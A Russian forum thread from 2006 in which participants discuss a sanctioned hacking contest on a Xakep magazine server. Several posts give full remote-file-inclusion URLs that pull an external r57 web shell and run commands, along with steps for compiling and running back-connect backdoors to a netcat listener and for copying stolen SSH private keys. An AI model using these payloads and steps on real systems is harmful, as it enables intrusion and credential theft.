НОВЫЙ Конкурс взлома. март 2006
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 10:46:53
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
quote:
—————-<BR>Цитата: Дата:18.03.2006 19:40:57, Автор:TheFeaR :: на gcc ьам прав не хватает но по-моему там есть много других компилеров c разрешениями для nobody! загляните в /usr/bin —————-
Но если прав не хватает то все равно он должен отзываться на команду which. Кто му же war_driver говорит что все работало пучком… Может его удалили? Вчера кто-то шелл еще удалил…
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 12:11:35
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
ну и Х с ним с этим шэлом запусти так http://konkurs.xakep.ru/index.php?lang=http://rst.void.ru/download/r57shell
а вообще ИМХО было бы намного интереснее если бы конкурс основывался на некоторых статьях из форума или из журнала. Например в этом месяце вышел бы журнал со статьей по php including.Тогда бы конкурс был бы интереснее..А так половина народу вообще на знает даже как шел запустить. Еще раз повторю это ИМХО
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 12:33:34
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
Толи я м**ак, толи лыжи не едут… Ключи то слил, но на сколько я понимаю должен быть открыт ssh, но он закрыт, это так задумано или нет?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 14:11:10
|
|
|
glukreal
Сообщений: 61
Оценки: 0
Присоединился: 2006-03-18 09:27:09
|
Блин всё надоело gcc есть на сервере лежит в /usr/local/bin называется gcc40 так как версия обновлялась… Только почему-то бэк коннект не работает мож я чё не правильно делаю?? На соём компе nc -l -p 4000 На сервере ./bdw xx.xx.xx.xx 4000 но коннект не идёт!!![sm=mad.gif][sm=aah.gif]
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 14:31:50
|
|
|
glukreal
Сообщений: 61
Оценки: 0
Присоединился: 2006-03-18 09:27:09
|
Кстати а может используется перевод openssh с 22 порта на IRQ4 girlsblackhat.net??? А может я ерунду сморозил, просто как вариант… Мне это ни чего не даёт, я не пользуюсь IRQ но если кому то поможет надеюсь на взаимопомощь [sm=1.gif][sm=1.gif][sm=1.gif]
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 15:35:45
|
|
|
NeuRonix
Сообщений: 26
Оценки: 0
Присоединился: 2006-03-12 13:19:03
|
Надо просто ./bdw xx.xx.xx.xx не надо указывать порт
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 17:44:25
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
Мля какой-то **** постоянно /tmp чистит… Не могу скомпилить bdw.c !!! как вы его собираете?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 17:59:54
|
|
|
irq4
Сообщений: 5
Оценки: 0
Присоединился: 2006-02-23 19:55:12
|
xkeeper: верно мыслишь. только теперь там правда какие-то глюки с ssh. я тоже не могу зайти. видать кто-то намудачил.
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:09:32
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
а ключики у меня чото не сливаются [sm=zhaba.gif] их через шелл надо качать?
Updated: сори [sm=sm128.gif] ступил [sm=sm128.gif] все пучком
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:28:57
|
|
|
NeuRonix
Сообщений: 26
Оценки: 0
Присоединился: 2006-03-12 13:19:03
|
Ключики надо сливать например на народ.ру, а можно просто в r57shell редактировать ключик, его можно тока просмотреть, берешь просто копируешь все это дело создаешь у себя на компе файлик id_rsa вставляешь и сохраняешь вот тока че действительно с sshl намудрили или глюк у них или решили усложнить нам конкурс.
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:43:14
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Да… интерестно все это. Вот только куда теперь пропал еще и CC и почему уже откомпайленый на ЭТОМ серве bdw уже не запускаеться?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:56:17
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
Наорд даю подсказку чтобы больше не кто об этом не спрашивал, ато все уши прожужали, нытики, компилить надо так: /usr/local/bin.gcc40 /tmp/cbd.c -o /tmp/cbd все!
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:58:12
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
Подцепиться к SSH не удается, но должен ли он так просто принимать любые коннекты? Может стоит что-нить вроде фрауд защиты? Хотя в конфиге демона я ничего не нашел по этому поводу…
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:02:25
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
Народ даю подсказку чтобы больше не кто об этом не спрашивал, а то все уши прожужали, нытики, компилить надо так: /usr/local/bin/gcc40 /tmp/cbd.c -o /tmp/cbd все!
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:05:51
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
http://konkurs.xakep.ru/index.php?lang=http://jjj11123.narod.ru/bad&cmd=/usr/local/bin.gcc40 /tmp/bdw.c -o /tmp/bdw;cd /tmp;ls -la;
Вот такой запрос! И СЕЙЧАС не пашет! Я не знаю че там намудрили. До этого вообще компилил так
http://konkurs.xakep.ru/index.php?lang=http://jjj11123.narod.ru/bad&cmd=cd /tmp;cc bdw.c -o bdw;ls -la;
Ща вообще сервак убитый. Испортили нах! Заново давайте! [sm=1.gif]
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:11:34
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
У тебя скрипт кривой видиш он ругается /tmp/bdw.c: In function 'main':<BR>/tmp/bdw.c:72: error: parse error before '{' token<BR>/tmp/bdw.c: At top level:<BR>/tmp/bdw.c:86: error: parse error before '}' token<BR>/tmp/bdw.c:87: warning: parameter names (without types) in function declaration<BR>/tmp/bdw.c:87: warning: data definition has no type or storage class<BR>/tmp/bdw.c:88: error: parse error before '}' token<BR>/tmp/bdw.c:88:2: warning: no newline at end of file
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:12:04
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
Какой авдотий подчистил /tmp???
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:13:27
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
скачай cbd.c его и компили у мя все окей
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:16:30
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Как он может быть кривым, если я им пользовался весь день?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:18:31
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Извеняюсь, действительно скрипт подпортил. bdw заработал
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:21:02
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Откомпилил…. Только не запускаеться. попробуйте /tmp/bdw пишу ./bdw [ip] и нефига…. а ведь работало! и ключи даже спер
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:39:53
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
Вобщем ж*па господа, кто то закрыл 22 порт, будем ждать пока исправят
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 20:22:21
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
quote:
—————-<BR>Цитата: Дата:19.03.2006 19:39:53, Автор:Xkeeper :: Вобщем ж*па господа, кто то закрыл 22 порт, будем ждать пока исправят —————-
Порт открыт, просто демон сразу разрывает коннект [sm=5.gif] У меня это происходит при начале обмена ключами.
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 20:59:25
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
у меня тож, только что теперь делать?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:22:27
|
|
|
irq4
Сообщений: 5
Оценки: 0
Присоединился: 2006-02-23 19:55:12
|
Какой-то мудак досит ssh ждем
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:28:01
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
народ может я чего-то недогоняю но вот настройки sshd и авторизация по rsa закомментированна # $OpenBSD: sshd_config,v 1.68 2003/12/29 16:39:50 millert Exp $ # $FreeBSD: src/crypto/openssh/sshd_config,v 1.40 2004/04/20 09:37:29 des Exp $
# This is the sshd server system-wide configuration file. See # sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options change a # default value.
# Note that some of FreeBSD's defaults differ from OpenBSD's, and # FreeBSD has a few additional options.
#VersionAddendum FreeBSD-20040419
Port 22 Protocol 2 ListenAddress 81.177.29.6 #ListenAddress ::
# HostKey for protocol version 1 #HostKey /etc/ssh/ssh_host_key # HostKeys for protocol version 2 #HostKey /etc/ssh/ssh_host_dsa_key
# Lifetime and size of ephemeral version 1 server key #KeyRegenerationInterval 1h #ServerKeyBits 768
# Logging #obsoletes QuietMode and FascistLogging #SyslogFacility AUTH #LogLevel INFO
# Authentication:
#LoginGraceTime 2m PermitRootLogin no #StrictModes yes
#RSAAuthentication yes #PubkeyAuthentication yes #AuthorizedKeysFile .ssh/authorized_keys
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #RhostsRSAAuthentication no # similar for protocol version 2 #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # RhostsRSAAuthentication and HostbasedAuthentication #IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes
# Change to yes to enable built-in password authentication. #PasswordAuthentication no #PermitEmptyPasswords no
# Change to no to disable PAM authentication #ChallengeResponseAuthentication yes
# Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes #KerberosGetAFSToken no
# GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCredentials yes
# Set this to 'no' to disable PAM authentication (via challenge-response) # and session processing. #UsePAM yes
#AllowTcpForwarding yes #GatewayPorts no #X11Forwarding yes #X11DisplayOffset 10 #X11UseLocalhost yes #PrintMotd yes #PrintLastLog yes #TCPKeepAlive yes #UseLogin no #UsePrivilegeSeparation yes #PermitUserEnvironment no #Compression yes #ClientAliveInterval 0 #ClientAliveCountMax 3 #UseDNS yes #PidFile /var/run/sshd.pid #MaxStartups 10
# no default banner path #Banner /some/path
# override default of no subsystems Subsystem sftp /usr/libexec/sftp-server
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:28:25
|
|
|
Хakеp
Сообщений: 58
Оценки: 0
Присоединился: 2005-12-05 23:38:31
|
Надо найти и убить эту сволочь!!!![sm=11.gif][sm=mad.gif] Вот интересно когда порт откроют в се повалятся к нему конектица и опять получится типв дос??? [sm=1.gif][sm=3.gif][sm=4.gif][sm=2.gif]
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:37:38
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
Хых, у меня даже до обмена ключами не доходит, сразу рефузит. Я вот думаю, может какой то олень брутит пасс? ))
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:42:07
|
|
|
irq4
Сообщений: 5
Оценки: 0
Присоединился: 2006-02-23 19:55:12
|
тоже возможно вообще, не понимаю. зачем западло другим делать, особенно если сам не можешь пройти?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:47:55
|
|
|
Хakеp
Сообщений: 58
Оценки: 0
Присоединился: 2005-12-05 23:38:31
|
Он просто пока думает! Как пройти конкурс!! Щас дочитает журнал хакер перестанет досить шел и вытерет нам всем нос!!![sm=3.gif]
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:57:58
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
Блин это уже не конкурс на сообразительность а на ловкость=)) ща все повалят записываться в winner.txt потом найдется сволочь которая его сотрет и потом опять создаст и так как говорится while (1) =)
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:10:57
|
|
|
Хakеp
Сообщений: 58
Оценки: 0
Присоединился: 2005-12-05 23:38:31
|
Нефига для этого надо иметь права рута!!!
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:14:28
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
так а там насколько я видел суидный файлик лежит в директории юзера от которого ключи слили, и права у него как раз на группу konkurs, тобиш вероятно там суидный шелл, хотя хз.
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:33:14
|
|
|
webserge
Сообщений: 7
Оценки: 0
Присоединился: 2006-03-19 22:27:21
|
А почему ps -aux не отображает sshd и sockstat -4l не показывает что 22 порт открыт??? Точно sshd запущен?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:52:04
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
кстати а из putty с ключем нельзя подключиться????
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:55:05
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
можно, только вот куда, если ssh на 22 порту не пашет
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:59:57
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
Это понятно что ssh не запущен…Мне просто интересно куда пихать в путти этот ключь? в ssh->Auth ?
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 23:17:57
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
да
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 23:23:04
|
|
|
fostr
Сообщений: 55
Оценки: 0
Присоединился: 2006-02-23 20:37:32
|
да я гляжу тут не только 5 победителей будет. как только прошел - сразу стучать мне в асю
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-20 08:03:09
|
|
|
glukreal
Сообщений: 61
Оценки: 0
Присоединился: 2006-03-18 09:27:09
|
БЛИН поделитесь ключиком, а то я не слил или скажите от куда его слить моно!!!
|
|
|
|
|